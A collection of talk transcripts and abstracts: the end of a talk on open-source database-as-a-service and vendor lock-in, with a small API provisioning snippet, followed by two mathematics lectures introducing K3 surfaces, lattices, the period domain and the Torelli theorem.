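        f"{PMM_URL}/v1/dbaas/clusters",      # illustrative path, not the real one
        data=payload,
        headers={"Content-Type": "application/json",
                 "Authorization": f"Bearer {API_TOKEN}"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


if __name__ == "__main__":
    print(provision_cluster("demo-cluster", "mysql", nodes=3))
```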
With that, let me go back to where I started. We can obviously see that database as a service has won, due to the unparalleled experience of using the database. We can all agree that software vendor lock-in sucks. And open source is really coming to the rescue: I believe that here, too, we will have a very credible open source database solution — from Percona for sure, but I also know there are a number of other players working in this space. For example, I would mention the folks at StackGres: they are also building a Kubernetes-based distribution, focused on PostgreSQL and optimised for user experience. You can check that out as well. With that, that's all I've got at this point. I would be happy to answer some of your questions. Hello. Okay. Thanks. So we had a couple of questions and I answered them briefly, but I can also go over them in more detail while I have a couple of minutes. If you ask how we compete with cloud databases as a service, while they are so simple, I think a lot here comes from two fronts. One is education: in my opinion, a lot of the folks I talk to do not really understand the difference between truly open source databases and the so-called open-source-compatible databases which are offered in the cloud, and then they get locked in and run into the downsides that follow. That is something we as an open source community need to continue working on, educating them about that. The second thing is usability. Because of how cloud vendors are able to integrate their offerings with the rest of their infrastructure, it is hard to beat them on usability. But I think that's where the 80/20 rule applies: if we get close enough on usability, the majority of folks will be able to use that, and that is going to be good enough. From a slides standpoint, I have uploaded the slides just now. As for the note about a health check and simple scripts, I think that's left over from another session. In terms of database leaks and misconfiguration cases, I would suggest searching for them — you will find a lot of articles about specific leaks. I didn't provide an example because I didn't want to put any particular database technology, or any particular company, on the spot, but there are plenty of examples. There is also a tool called Shodan which actually reports the number of open instances, and I think that's a great way to show how prevalent that misconfiguration problem really is. Okay, good — thank you.
|
The database market is changing drastically in ways no one imagined 5 years ago. Database vendors are moving away from traditional deployment methods and embracing database as a service (DBaaS) as the default method to offer their database technologies to consumers and users. Much of this movement has been built on the success and popularity of DBaaS offerings by major cloud vendors. Unfortunately, this is leading to a new era of NROSS (Not Really Open Source Software) technologies that pretend to be free, open, and transparent but simply are not. As people wake up from the hangovers caused by the incompatibilities, lack of portability, and increased costs, they are looking at how to reclaim the openness, transparency, and freedom true open source has provided them in the past. The speaker will explore the trends and give his opinions and ideas on how we need to disrupt the current trends to keep open source open, and give users the freedom of having a quality alternative.
|
10.5446/53766 (DOI)
|
Okay, thank you very much to Erwan and Xavier for giving me the possibility to give this lecture here. It's really a great pleasure to be here. I will talk about some topics on K3 surfaces, and since this is a lecture course, let me give you the contents. I will start today with a short introduction about the position of K3 surfaces in the Enriques–Kodaira classification. Then, still today I think, I will give you several examples of K3 surfaces; in particular we will talk about, for example, complete intersections, and about Kummer surfaces — a very nice example of K3 surfaces, very strictly related to the abelian surfaces you have seen this morning. I will then talk about the basic properties of K3 surfaces, and finally state some important results: for example, you will start seeing how lattice theory plays an important role when you work with K3 surfaces, and we will at least formulate the surjectivity of the period map and the Torelli theorem, which are two very big theorems for K3 surfaces. That will be maybe today and tomorrow. Then we will start studying automorphisms — some general facts on automorphisms of K3 surfaces — and then I will focus, I hope towards the end of the lectures, on results on symplectic automorphisms. If time permits, I will also talk about moduli spaces of K3 surfaces with automorphisms. So let's start with a brief introduction; let's say this is paragraph one: K3 surfaces in the Enriques–Kodaira classification. For me, a surface is a compact complex manifold — so in particular smooth — of dimension two. We will maybe talk about singular K3 surfaces at some point, but in general what I consider is always smooth. In this first part I will recall something that maybe you know already. When one wants to classify surfaces — and this is not only for surfaces, one can do it more in general — an important tool is the Kodaira dimension. Let's recall briefly what it is. Well, first, before doing that: I will say that a surface is projective if there is an embedding — again, as you have seen this morning for tori — an embedding of S in some projective space Pⁿ, and as I said at the beginning, I am always working over the complex numbers. I will work most of the time in the projective setting; if not, I will tell you. So the problem is: classify projective surfaces. What does it mean to classify projective surfaces? Well, this goes back to Enriques and Castelnuovo around 1910: they gave a birational classification of surfaces. When you classify curves, you classify them up to isomorphism, but when you start to work with surfaces, a new phenomenon appears, which is the blow-up. So birational classification means — just to fix notation — that S is equivalent to S′ if there is a birational map F : S → S′. As I said, an example of a birational map, which explains why one wants to classify up to birational maps, is the blow-up. This does not happen for curves, of course, so there it does not make sense to talk about it. So, the blow-up: you have your surface S on one side, you make the blow-up, and essentially you replace a point by what is called a (−1)-curve.
Call this curve E: this means that E is isomorphic to P^1 and E^2 = −1; E is the exceptional curve, and the blow-up is an isomorphism outside it. In this lecture I will always assume that we do not consider surfaces obtained by such blow-ups: we always take S minimal, that is, S does not contain any curve E with E isomorphic to P^1 and E^2 = −1. Restricting to minimal surfaces costs nothing: if a surface contains such a (−1)-curve, you can blow it down to a smooth point and consider the resulting smooth surface.

How do we define the Kodaira dimension? For notation, I denote by K_S the canonical divisor on S (S will always denote a surface; if I change notation I will tell you). As this morning, I denote by Omega^2_S the bundle of holomorphic 2-forms on S, whose sheaf of sections is the sheaf associated to K_S; I will often switch between the sheaf and the vector bundle, depending on what I am talking about. Then consider global sections H^0(S, O_S(K_S)), and, more generally, global sections of the tensor powers, H^0(S, O_S(nK_S)) for n a natural number. Given such sections, take a basis s_0, ..., s_N; one gets a rational map phi_{nK_S} from S to the projective space P^N = P(H^0(S, O_S(nK_S))^dual), in other words the map given by the linear system |nK_S|, the effective divisors linearly equivalent to nK_S. Now the definition: the Kodaira dimension kappa(S) of S is the maximum over n of the dimension of the image phi_{nK_S}(S), or rather of its closure, since the map is only rational. Immediately one has some facts. The Kodaira dimension cannot exceed the dimension of S (one can define it not only for surfaces but for varieties in general), so kappa(S) is 0, 1 or 2; and if there are no sections at all, so that the vector space H^0(S, O_S(nK_S)) is zero for every n and there is no map to write down, we set kappa(S) = −∞. So when you classify surfaces, you can classify them using the Kodaira dimension, studying what happens when it is −∞, 0, 1 or 2.
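Written out, the definition just given reads as follows (my formulas, summarizing the blackboard):
\[
\varphi_{nK_S}\colon S \dashrightarrow \mathbb{P}\bigl(H^0(S,\mathcal{O}_S(nK_S))^{\vee}\bigr),
\qquad
\kappa(S)=
\begin{cases}
-\infty, & \text{if } H^0(S,\mathcal{O}_S(nK_S))=0 \text{ for all } n\ge 1,\\
\max_{n\ge 1}\dim\,\overline{\varphi_{nK_S}(S)}, & \text{otherwise,}
\end{cases}
\]
so that for a surface one has kappa(S) in {−∞, 0, 1, 2}.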
kappa(S) = −∞ means, as I said, that every pluricanonical system is empty. Let us recall what happens for Kodaira dimension −∞, 1 and 2; our favourite case will be Kodaira dimension 0. First case: kappa(S) = −∞. Think of the projective plane, for example: it satisfies exactly this condition. These are the rational surfaces, the surfaces birational to P^2: P^2 itself, all the blow-ups of P^2 (you get the del Pezzo surfaces there), plus, and let me separate the two even if one could put everything together, the ruled surfaces. I separate them just to put some accent on the case of P^2. Ruled means that there is a birational map from S to C x P^1, where C is a curve of genus g(C) at least 0. Of course, if you allow genus 0 here, any surface of the first kind is also of the second, so this is not a disjoint description; I just wanted to point out the two situations, which are distinguished by the irregularity of the surface. Anyhow, here you probably have plenty of examples in mind.

Let us now go to Kodaira dimension 0, which is, as I said, our favourite case. I will say something very quickly now and more in detail during the course. Kodaira dimension 0 means that the image of every pluricanonical map is a point. Here you have four kinds of surfaces. One you have already seen this morning: abelian surfaces, that is, C^2/Lambda with Lambda a lattice of rank four. Here I am in the projective setting: as we saw this morning, not every torus is projective (again a difference with Riemann surfaces and curves), so I say abelian surfaces, meaning tori with an embedding in some P^n. Then you have K3 surfaces; I will not say anything about them now, because we have the whole course to talk about them. Then you have Enriques surfaces: since one important point of our course will be automorphisms, let me note that these are exactly the quotients of K3 surfaces by fixed-point-free involutions, and they can all be described that way. I will not talk about Enriques surfaces themselves, but I hope to say a little about such fixed-point-free involutions when talking about automorphisms. And then you have the bielliptic surfaces, which are related to abelian surfaces: they are finite quotients of products E x E' of two elliptic curves. These are all classified, by Bagnera and de Franchis, I think around 1907. How does such a quotient look? You have a finite group acting on one curve so that the quotient is P^1, and acting by translations on the other one; the quotient gives you a bielliptic surface. That is all for Kodaira dimension 0.

Now Kodaira dimension 1, very quickly. In this case kappa(S) = 1, the image is a curve, and these are called properly elliptic surfaces. The special fact about properly elliptic surfaces is that they always carry an elliptic fibration: without going too much into the details, there is a map to some curve whose general fibre is an elliptic curve. One says properly elliptic to distinguish them, for example, from K3 or rational surfaces which may also happen to be elliptic.
Indeed there exist K3 surfaces that are elliptic: not every K3 surface has an elliptic fibration, but there are K3 surfaces that do. The last class, which is the huge one, is kappa(S) = 2, the surfaces of general type. It is somehow the more mysterious class, where there is a lot of work on the structure of surfaces of general type with given p_g, irregularity, and so on. If you look at this classification, it reminds you very much of what is done for curves: genus 0, genus 1, and genus at least 2. Curves of genus at least 2 are of general type, genus 1 gives the elliptic curves, and genus 0 is rational, that is P^1. So this is how the picture looks one dimension higher.

Let us now start talking about K3 surfaces. One first thing to mention, if you have never (or only rarely) heard about them, is why they are called K3. The name was given by André Weil in 1958, when he was writing a report on a project and wrote about these beautiful objects. It was given partly in honour of the K2 mountain in Kashmir: just a few years before 1958 that mountain had been climbed for the first time, which made a huge publicity and was quite impressive, and Weil found these surfaces as beautiful, or maybe as difficult, as that mountain, so the name K3 came after K2. In fact there is also a K3 mountain in Kashmir, but it is not so high, so it was somehow forgotten. And the name is also in honour of three very famous mathematicians: Kummer, whom we will meet when we talk about Kummer surfaces, Kähler, whom you heard about this morning, and Kodaira. These are the three K's of K3. So this is the origin of the strange name.

The easiest example of a K3 surface is maybe the following; let us look at it and at its properties, which will lead us to the definition of a K3 surface. Take the Fermat quartic surface, the zero set of x_0^4 + x_1^4 + x_2^4 + x_3^4 in P^3. This is a very symmetric surface with very nice geometric properties; it contains, for example, a lot of lines. One remarks immediately that it is smooth: the partial derivatives, which are of the form 4x_i^3, have no common zero. (Any time I define a K3 by polynomial equations it will be smooth; I will always impose this kind of condition.) We observe two properties of this surface. First, consider the canonical divisor. To compute it, use adjunction: the canonical class of X_4 is K_{X_4} = (K_{P^3} + X_4) restricted to X_4. The canonical class of P^3 is −4H, where H is the class of a hyperplane section, and X_4 is linearly equivalent to 4H, so one sees immediately that this is trivial: K_{X_4} = 0.
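For reference, the adjunction computation just described, written out:
\[
K_{X_4}=\bigl(K_{\mathbb{P}^3}+X_4\bigr)\big|_{X_4}=\bigl(-4H+4H\bigr)\big|_{X_4}=0,
\]
where H denotes the hyperplane class on P^3.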
The second property we want to establish is that q(S) := h^1(O_S), the irregularity, vanishes. Recall that when one classifies surfaces one always uses two birational invariants: the irregularity q(S) = h^1(O_S) = h^0(Omega^1_S), the space of global 1-forms you remember from this morning's lecture, and the geometric genus p_g = h^0(Omega^2_S), which we will discuss in a minute. To compute the irregularity I will use the Lefschetz theorem, and in fact I will say a bit more: K3 surfaces are simply connected. The Lefschetz theorem on hyperplane sections tells you that the fundamental group pi_1(X_4) equals pi_1(P^3), which is trivial; in particular X_4 is simply connected. This tells us that the abelianization of pi_1, which is H_1(X_4, Z), vanishes, and hence so does its rank; tensoring with C, H^1(X_4, C) = 0. By the Hodge decomposition H^1(X_4, C) = H^{0,1} + H^{1,0}, that is h^1(O_{X_4}) + h^0(Omega^1_{X_4}); here everything is projective, hence Kähler, and the two dimensions are equal, so each of them is zero. Therefore the irregularity of X_4 is zero. There are other ways to show this; one can also use an exact sequence involving the structure sheaves of X_4 and of P^3, and so on. I did it this way because you already see some properties that we will soon establish for every K3 surface.

Let me also remark on the canonical divisor: since X_4 is a hypersurface, one can write down explicitly how a canonical form looks. In the chart x_i different from 0, where the partial derivative df/dx_j is different from 0, one can write the 2-form corresponding to the global section of K_{X_4} as dx_h wedge dx_k divided by df/dx_j, where the indices h, k, j, i are all distinct. This gives a global holomorphic 2-form which is nowhere zero, with no zeros and no poles; so you see something more, namely that there is a global 2-form that never degenerates.
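In formulas, the nowhere-vanishing 2-form on the quartic hypersurface X_4 = {f = 0} just described is, on the chart where x_i is non-zero and the derivative of f with respect to x_j is non-zero,
\[
\omega \;=\; \frac{dx_h\wedge dx_k}{\partial f/\partial x_j},
\qquad \{h,k,i,j\}=\{0,1,2,3\},
\]
and these local expressions glue to a global holomorphic 2-form without zeros or poles, trivializing K_{X_4}.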
Resuming the properties we have found: K_{X_4} is trivial and the irregularity is also trivial. We can now give the definition of a K3 surface using these two properties of X_4. A compact complex surface S (again, for me everything is smooth) is a K3 surface if K_S is trivial and q(S) = 0. One can find equivalent definitions: for X_4 I showed that it is simply connected and then deduced that the irregularity is zero, so that implication is somehow trivial; the other implication is not, because q = 0 does not immediately give simple connectedness, you have to kill torsion, but it does not take too much work.

Some remarks. Here I am in the complex setting, and, going for a moment outside the projective setting, K3 surfaces are not all projective. Most of the time I will consider projective K3 surfaces, and if not I will tell you; but not all K3 surfaces are projective, one even says that the generic K3 is not projective, although they are all Kähler, which is a very good property. One easy way to construct non-projective K3 surfaces is to start with a non-projective torus and carry out the Kummer construction we are going to do: you get a Kummer K3 which is then not necessarily projective. Another remark: one can show that the vanishing of the irregularity, h^0(Omega^1_S) = 0 (as usual the small h denotes the dimension; I did not say this because it is standard notation), is equivalent to S being simply connected. As I said, one implication is essentially what I did above; for the other one has to kill torsion. We will not prove this now, but we will see a very similar computation when we show that the second cohomology of a K3 with integer coefficients is a lattice, and there you will see how one goes from one statement to the other. And since I was talking about the geometric genus: for a K3 surface S, p_g = h^0(Omega^2_S) = 1, just to complete the picture in the classification of surfaces.

What we do next, before giving the general properties, is to look at more examples; I think examples are always important to have in mind in order to understand what happens in general. I will leave some of them as exercises, because the computations are very similar to what I did for the quartic. The next, very geometric, examples are complete intersections. So, section two: examples of K3 surfaces, complete intersections. First, let me include among the complete intersections the quartics in P^3: any smooth quartic in P^3 is a K3, not only the Fermat one; take a generic one, in the sense that I do not want a singular one, and the same computation works. Then take S_{2,3}, a complete intersection of a quadric and a cubic in P^4 (complete intersection means they meet transversally, so it is smooth); this is again a K3. And S_{2,2,2}, a complete intersection of three quadrics in P^5, is again a K3. I leave it as an exercise for Wednesday to show that these are K3 surfaces: to show that the irregularity is zero the proof is again Lefschetz (you use Lefschetz to get simple connectedness, hence q = 0), and to show that the canonical divisor is trivial you use adjunction several times. These are all the complete-intersection K3 surfaces: if you go to higher P^n you can still find K3 surfaces in any P^n, but they are no longer complete intersections; you get K3 surfaces in Grassmannians and so on.
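For the exercise on complete intersections, the adjunction computations are analogous to the quartic case; for instance (my write-up of the computation the lecturer leaves as an exercise):
\[
K_{S_{2,3}}=\bigl(-5H+2H+3H\bigr)\big|_{S_{2,3}}=0,
\qquad
K_{S_{2,2,2}}=\bigl(-6H+2H+2H+2H\bigr)\big|_{S_{2,2,2}}=0,
\]
while q = 0 follows from the Lefschetz hyperplane theorem exactly as for X_4.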
There are more nice examples of K3 surfaces that I want to talk about, namely the double planes, and then we will go to Kummer surfaces. So, the K3 double plane; we will do the computation to see that it really is a K3. Take S a double cover of P^2: a map pi from S to P^2 which is 2:1 and is ramified over a smooth sextic curve, call it C_6. We want to see that S is a K3, so let us show that the canonical class is trivial and that the irregularity is zero.

First the canonical divisor. Using the standard property of double covers, K_S = pi*K_{P^2} + R, where R is the ramification divisor on S, so pi(R) = C_6, and the pull-back of the branch curve satisfies pi*C_6 = 2R (the factor 2 comes from the fact that the map is 2:1). From this formula, 2K_S = pi*(2K_{P^2}) + 2R = pi*(2K_{P^2} + C_6). Now recall that K_{P^2} = −3L, with L the class of a line, and C_6 = 6L; so 2K_S = pi*(−6L + 6L) = 0. So we get that 2K_S is trivial. Now we have to think a bit, because we want K_S itself to be trivial, and we cannot conclude immediately. What we do know is that if K_S is not trivial (while 2K_S = 0), then K_S has no global section: h^0(O_S(K_S)) = 0.

Now we use some topology and compute the topological Euler characteristic of S; this is quite interesting, because it will show us another property of K3 surfaces that we will meet again later. Since S is a double cover ramified over C_6, e_top(S) = 2(e_top(P^2) − e_top(C_6)) + e_top(R), and e_top(R) = e_top(C_6) because pi identifies R with C_6. We have e_top(P^2) = 3, and C_6 is a smooth plane curve of degree 6, hence of genus 10, so e_top(C_6) = 2 − 2g = −18. Therefore e_top(S) = 2(3 + 18) − 18 = 24. This is not strange, it is in fact very nice, because this number does not change for K3 surfaces: let me just claim, without any proof, that all K3 surfaces are diffeomorphic, so any time we will find 24.

How do we use this? With the Noether formula: chi(O_S) = h^0(O_S) − h^1(O_S) + h^2(O_S) = (K_S^2 + e_top(S))/12. Since 2K_S = 0, the self-intersection K_S^2 is also 0, and e_top(S) = 24, so chi(O_S) = 24/12 = 2. But h^2(O_S) is, by Serre duality, dual to h^0(O_S(K_S)), which is 0 under our assumption, and h^0(O_S) = 1; so we would get 1 − h^1(O_S) = 2, which is of course impossible, since h^1(O_S) is at least 0. This contradiction came from assuming that K_S is not trivial.
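In formulas, the two computations just made are
\[
e_{\mathrm{top}}(S)=2\bigl(e_{\mathrm{top}}(\mathbb{P}^2)-e_{\mathrm{top}}(C_6)\bigr)+e_{\mathrm{top}}(C_6)
=2\bigl(3-(-18)\bigr)-18=24,
\]
using g(C_6) = 10, and then Noether's formula
\[
\chi(\mathcal{O}_S)=\tfrac{1}{12}\bigl(K_S^2+e_{\mathrm{top}}(S)\bigr)=\tfrac{0+24}{12}=2
=1-h^1(\mathcal{O}_S)+h^0(\mathcal{O}_S(K_S)),
\]
which is contradictory if h^0(O_S(K_S)) = 0, i.e. if K_S were non-trivial.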
So this implies that K_S is linearly equivalent to 0. And looking again at the same equality, now with K_S trivial: we have 2 = 1 − h^1(O_S) + 1, so h^1(O_S) = 0, which is exactly the statement that q(S) = 0. So indeed this double plane is a K3 surface. How much time do I have? A few minutes. Then let me just say one more thing and stop, because we will start again afterwards. If one wants to give an equation of a double plane (and we will see this example come back several times during the course), an equation for S is the following: t^2 = f_6(x_0, x_1, x_2), where the sextic ramification curve C_6 has equation f_6 = 0. If you want, this sits naturally in the weighted projective space P(3,1,1,1); the weights of course come from the double cover, and you can check that the equation is homogeneous of the right weighted degree. So maybe I stop here, and we start again after the break.
|
Aim of the lecture is to give an introduction to K3 surfaces, which are special algebraic surfaces with an extremely rich geometry. The easiest example of such a surface is the Fermat quartic in complex projective three-space. The name K3 was given by André Weil in 1958 in honour of the three remarkable mathematicians Kummer, Kähler and Kodaira, and of the beautiful K2 mountain in Kashmir. The topics of the lecture are the following: * K3 surfaces in the Enriques-Kodaira classification. * Examples; Kummer surfaces. * Basic properties of K3 surfaces; Torelli theorem and surjectivity of the period map. * The study of automorphisms on K3 surfaces: basic facts, examples. * Symplectic automorphisms of K3 surfaces, classification, moduli spaces.
|
10.5446/53768 (DOI)
|
[The opening minutes of this recording are unintelligible.] Let me make a small parenthesis from K3 surfaces and recall some basic facts on lattices. I take L a free Z-module; a lattice, by definition, is a free Z-module (this is what we have seen for H^2: it has no torsion, so it is a free Z-module) together with a symmetric bilinear form, which I will denote by b: L x L → Z. So a lattice always comes with its bilinear form. Some definitions. We say that L is non-degenerate if the matrix M of b has det M different from zero; for me all lattices will always be non-degenerate. We call |det M|, the determinant in absolute value, the discriminant of L (one should be careful not to confuse it with the discriminant group, but we will talk about that later). L is unimodular if det M = ±1. L is even if b(x, x) belongs to 2Z for every x, which for example is the case for K3 surfaces; otherwise we say that L is odd. The signature of L is of course the signature of b on L tensor R; if L is non-degenerate we denote it by (s_+, s_−), the numbers of positive and negative eigenvalues, the +1's and the −1's. One more piece of notation: L(m) denotes the same Z-module L with the form multiplied by a constant, b_{L(m)}(x, y) = m · b(x, y), for some non-zero m. Then we have the notion of isometry; these are the last definitions for now, and any time I need something more I will introduce it later. Two lattices (L_1, b_1) and (L_2, b_2) are isometric if there is an isomorphism of Z-modules f: L_1 → L_2 which respects the bilinear forms, that is, b_2(f(x), f(y)) = b_1(x, y). If L_1 = L_2 = L, we speak of the isometries of the lattice L, and they form a group denoted O(L).

So, just this terminology; maybe we will see more properties later. Let us now go back to H^2. As we have seen, H^2(S, Z) is a free Z-module, and it is a lattice with the intersection pairing, the cup product, which I can write explicitly as (alpha, beta) goes to the integral over S of alpha wedge beta. This pairing is unimodular by Poincaré duality.
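Collected in formulas, the definitions just listed (my summary):
\[
b\colon L\times L\to\mathbb{Z}\ \text{symmetric},\quad
\operatorname{disc}(L)=|\det M_b|,\quad
L\ \text{unimodular}\iff \det M_b=\pm1,\quad
L\ \text{even}\iff b(x,x)\in 2\mathbb{Z}\ \ \forall x\in L,
\]
with signature (s_+, s_−) of b on L tensor R, twisted lattice L(m) given by the form m·b, and O(L) the group of isometries of (L, b).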
So, with the intersection pairing, H^2(S, Z) is non-degenerate and unimodular. Now we want to understand why it is isometric to the direct sum I wrote before, and for that we look at the signature. First of all, we have seen that H^2(S, Z) has rank 22, so the signature satisfies s_+ + s_− = 22. We also need a formula from topology connecting the signature of the intersection form with the Chern numbers, the topological index theorem. It says that the signature of b, that is s_+ − s_− (the number of +1 eigenvalues minus the number of −1 eigenvalues), equals (c_1^2 − 2c_2)/3, where c_1 and c_2 are the Chern numbers. Here c_1 = c_1(S) is the first Chern class: it is the Chern class of the tangent bundle, but by the standard properties of Chern classes it equals minus the canonical class; and c_2 is just e_top(S), which is 24. Let us compute: s_+ − s_− = (K_S^2 − 2·24)/3 = (0 − 48)/3 = −16, since the canonical class squared is 0. Putting the two equalities together, one easily gets s_+ = 3 and s_− = 19. So we have a unimodular lattice with this signature.

Next I claim that H^2(S, Z) is even. Again one should use a result from topology, so take the following as a fact: H^2(S, Z) is even. Let me at least give a justification, a bit of motivation, which one sees easily on irreducible curves. A curve gives a class in the Picard group, which sits inside H^2, and we have the genus formula: for an irreducible curve C on S, g(C) = 1 + (1/2) C·(C + K_S); this holds not only for K3 surfaces but in general. Since K_S = 0, we get C^2 = 2g − 2, which is clearly even, so this is at least one motivation to believe that the lattice is even. It was also an occasion to state the genus formula, which is very useful: it gives you the self-intersection of all curves on a K3. For example, if the genus is 0 the self-intersection is −2, so a rational curve on a K3 has self-intersection −2, and so on.

Resuming: H^2(S, Z) is an even unimodular lattice of signature (3, 19).
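In formulas, the two computations just made:
\[
s_+ + s_- = \operatorname{rk} H^2(S,\mathbb{Z}) = 22,
\qquad
s_+ - s_- = \tfrac{1}{3}\bigl(c_1^2 - 2c_2\bigr) = \tfrac{1}{3}(0 - 48) = -16
\;\Longrightarrow\; (s_+, s_-) = (3, 19),
\]
and the genus formula on a K3 surface, giving evenness on classes of curves:
\[
g(C) = 1 + \tfrac12\, C\cdot(C + K_S) = 1 + \tfrac12\, C^2
\;\Longrightarrow\; C^2 = 2g(C) - 2 \in 2\mathbb{Z}.
\]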
To identify this lattice we now use a classification result for unimodular lattices, a theorem of Milnor. Theorem (Milnor): let L be a unimodular indefinite lattice, indefinite meaning that s_+ > 0 and s_− > 0. Then there are two cases. If L is odd, then L is isometric to <1>^m plus <−1>^n, with m and n positive natural numbers (both positive because L is indefinite); writing <+1> or <−1> I just mean the rank-one lattice generated by a vector of square +1, respectively −1. If L is even, then L is isometric to U^h plus E8(±1)^k, where U is the hyperbolic plane, the even unimodular rank-two lattice of signature (1,1), E8 is the even unimodular positive definite lattice of rank 8, h is positive and k is non-negative. [Parts of this passage are unintelligible in the recording.]

Let us apply this to H^2(S, Z), which is even, unimodular and of signature (3, 19). The only possibility is three copies of U, which give the three positive squares, and the rest, the remaining 19 negative squares: 3 come from the copies of U and 16 from E8(−1) taken two times. So H^2(S, Z) is isometric to U^3 plus E8(−1)^2; this lattice is called the K3 lattice, and I will denote it Lambda_{K3}. And the interesting fact is that, as I said, this does not depend on the K3 surface: all K3 surfaces are diffeomorphic, so the second cohomology with its intersection form is always this lattice. [A stretch of the recording here is unintelligible.]

Let me also record the Hodge diamond of a K3 surface, listing h^{0,0}; h^{1,0}, h^{0,1}; h^{2,0}, h^{1,1}, h^{0,2}; h^{2,1}, h^{1,2}; h^{2,2} with their dimensions: h^{0,0} = 1; h^{1,0} = h^{0,1} = 0; h^{2,0} = h^{0,2} = 1; h^{1,1} = 20; h^{2,1} = h^{1,2} = 0; h^{2,2} = 1. [A further stretch of the recording is unintelligible.]
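For reference, the two facts just stated, in standard notation (my write-up):
\[
H^2(S,\mathbb{Z})\;\cong\;\Lambda_{K3}:=U^{\oplus 3}\oplus E_8(-1)^{\oplus 2},
\qquad
\begin{array}{ccccc}
&&1&&\\
&0&&0&\\
1&&20&&1\\
&0&&0&\\
&&1&&
\end{array}
\]
the array on the right being the Hodge diamond of a K3 surface.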
Now I want to say something about the surjectivity of the period map and the Torelli theorem. I will not prove them; that would take maybe all the time of the lectures. But I want to give you some motivation, where the period of a K3 lives and why it is so important, because I would like to start, today or tomorrow, talking about automorphisms, where you will see the power of the Torelli theorem. Let us set this up. We have seen, with the notation fixed before, that H^0(S, Omega^2_S) = H^0(S, O_S(K_S)) is generated by omega_S, the global holomorphic two-form. The bilinear form on H^2, the intersection pairing, can be extended to H^2(S, C), extending it C-bilinearly. Let us do some easy computations.

Take omega_S and compute b(omega_S, conj(omega_S)). By the definition of the bilinear form this is the integral over S of omega_S wedge its conjugate. Now omega_S can be written in local coordinates as alpha dz_1 wedge dz_2 with alpha holomorphic, so when I write down the integral I get the integral of |alpha|^2 dz_1 dz_2 dz̄_1 dz̄_2, and this is positive: as Julien was also saying this morning, the integrand is just a volume form. If I do exactly the same computation with b(omega_S, omega_S), it easily gives zero. These are the conditions one gets on the two-form. Let us also remark the following: if gamma is in H^{1,1}(S), a (1,1)-class, then the same kind of computation (write everything out in dz_1, dz_2 and their conjugates) gives b(omega_S, gamma) = 0. This implies that H^{1,1} is orthogonal, with respect to the bilinear form, to H^{2,0} + H^{0,2}. Remark that this last is a direct sum as vector spaces, but the two summands are not orthogonal to each other for the pairing, because, as I just showed, b(omega_S, conj(omega_S)) is positive; the orthogonality is only with H^{1,1}.

The two-form omega_S, or rather its class, is called the period of the K3; I will use "two-form" and "period" interchangeably. The line C·omega_S, that is the point [omega_S], belongs to the projectivization P(H^2(S, Z) tensor C) (let me write it this way so that we never forget that underneath there is a lattice), and it satisfies (omega_S, omega_S) = 0 and (omega_S, conj(omega_S)) > 0. From now on I drop the b and just write the pairing; it is always the same bilinear form.

Now we have to introduce a marking, because this H^2 is still in some sense attached to my particular K3; I would like to forget that and pass to the abstract lattice Lambda_{K3}, in the direction of the period domain. Definition: a marking of a K3 surface S is the choice of an isometry phi: H^2(S, Z) → Lambda_{K3}, where Lambda_{K3} is the K3 lattice, three copies of U and two copies of E8(−1). With a marking we then have the following: passing to the complexification, phi_C: H^2(S, C) → Lambda_{K3} tensor C, and to the class of omega_S, or rather to the line C·omega_S (remember the two-form is uniquely determined only up to a constant, so we always take the line), we associate its image. In this way we get the following object. Let Omega be the set of points [omega] of P(Lambda_{K3} tensor C) (remember Lambda_{K3} has rank 22, so this is a P^21) such that (omega, omega) = 0 and (omega, conj(omega)) > 0. This is what we call the period domain: inside P^21 the first condition is a quadric, and the second one cuts out an open subset.
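Written out, the marking and the period domain just introduced are (my notation):
\[
\varphi\colon H^2(S,\mathbb{Z})\;\xrightarrow{\ \sim\ }\;\Lambda_{K3}=U^{\oplus3}\oplus E_8(-1)^{\oplus2},
\qquad
\Omega=\bigl\{[\omega]\in\mathbb{P}(\Lambda_{K3}\otimes\mathbb{C})\;:\;(\omega,\omega)=0,\ (\omega,\bar\omega)>0\bigr\},
\]
an open subset (in the analytic topology) of a quadric in P^{21}, hence of dimension 20, containing phi_C(C·omega_S) for every marked K3 surface (S, phi).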
Even more explicitly, let us write it in coordinates: choosing a basis in which the form is diagonal with signature (3, 19), Omega is the set of points [z_0 : ... : z_21] such that z_0^2 + z_1^2 + z_2^2 − z_3^2 − ... − z_21^2 = 0 (this is the quadric, the first condition) and |z_0|^2 + |z_1|^2 + |z_2|^2 − |z_3|^2 − ... − |z_21|^2 > 0 (the second condition, the open one). So you see that this is an open subset, in the analytic topology, of a quadric in P^21, and this period domain is 20-dimensional. By the computation we did, for a K3 surface S with a marking phi, the point phi_C(C·omega_S) belongs to Omega. So Omega is the period domain of marked K3 surfaces; for the moment you cannot get rid of the marking, and we will talk about that in a moment.

Not only is it true that the period of a marked K3 is a point of Omega; the surjectivity of the period map says that every point arises this way. [The statement is partly inaudible in the recording; it is the following.] For every omega in Omega there exist a K3 surface S and a marking phi such that phi_C(C·omega_S) = omega. Suppose now that we have two marked K3 surfaces (S, phi) and (S', phi') with the same period, that is phi_C(C·omega_S) = omega and phi'_C(C·omega_{S'}) = omega. Composing, the inverse of phi' composed with phi is an isometry from H^2(S, Z) to H^2(S', Z) which sends the period of S to the period of S'. [A stretch of the recording is unintelligible.] In this situation S is in fact isomorphic to S', by the following theorem, which is the weak Torelli theorem: S and S' are isomorphic if and only if there is an isometry psi from H^2(S, Z) to H^2(S', Z) such that, after extending to C, it sends the period of the first one to the period of the second one. An isometry with this property is called a Hodge isometry; in particular it preserves the Hodge decomposition when you pass to C. So this tells us that, up to the marking, the K3 with a given period is unique: at a point of Omega, what can change is only the marking, not the K3. And in a minute I will also give you the strong Torelli theorem, which says even something more.
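For reference, the two statements just formulated (my write-up of the standard formulations):
\[
\text{(Surjectivity of the period map)}\quad
\forall\,\omega\in\Omega\ \ \exists\ \text{a marked K3 surface }(S,\varphi)\ \text{with}\ \varphi_{\mathbb{C}}(\mathbb{C}\,\omega_S)=\omega;
\]
\[
\text{(Weak Torelli)}\quad
S\cong S' \iff \exists\ \text{a Hodge isometry}\ \psi\colon H^2(S,\mathbb{Z})\to H^2(S',\mathbb{Z}),\ \text{i.e. }\psi_{\mathbb{C}}(\mathbb{C}\,\omega_S)=\mathbb{C}\,\omega_{S'}.
\]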
